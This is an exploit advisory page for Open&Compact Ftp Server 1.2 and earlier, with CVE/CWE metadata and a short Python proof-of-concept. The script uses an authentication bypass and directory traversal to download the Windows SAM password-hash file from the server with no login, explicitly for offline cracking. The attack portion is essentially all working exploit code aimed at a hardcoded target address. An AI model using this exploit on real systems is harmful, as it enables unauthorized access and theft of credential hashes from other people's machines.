Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval

2013.08.08

Credit: Wireghoul

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-22

#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking
import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )
ftp.quit()

References:

http://www.justanotherhacker.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.